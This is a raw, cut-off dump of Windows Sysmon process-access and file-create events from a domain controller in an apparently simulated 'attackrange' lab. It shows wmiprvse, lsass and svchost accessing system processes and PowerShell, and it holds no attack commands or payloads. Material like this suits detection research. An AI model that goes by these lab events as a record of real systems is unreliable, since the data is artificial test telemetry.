15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026501Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026500Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026499Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026498Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026497Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026496Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026495Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026494Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026493Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026492Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026491Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026490Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026489Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026488Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026487Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026486Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.959{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026485Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.178{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026484Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.178{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026483Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.131{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026482Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.131{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000026481Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.100{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_f1p3lmab.qia.ps12021-01-20 15:59:37.100 10341000x800000000000000026480Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.085{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026479Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.038{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5369-6008-6A06-00000000A301}6204C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026478Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.038{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5369-6008-6A06-00000000A301}6204C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026477Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 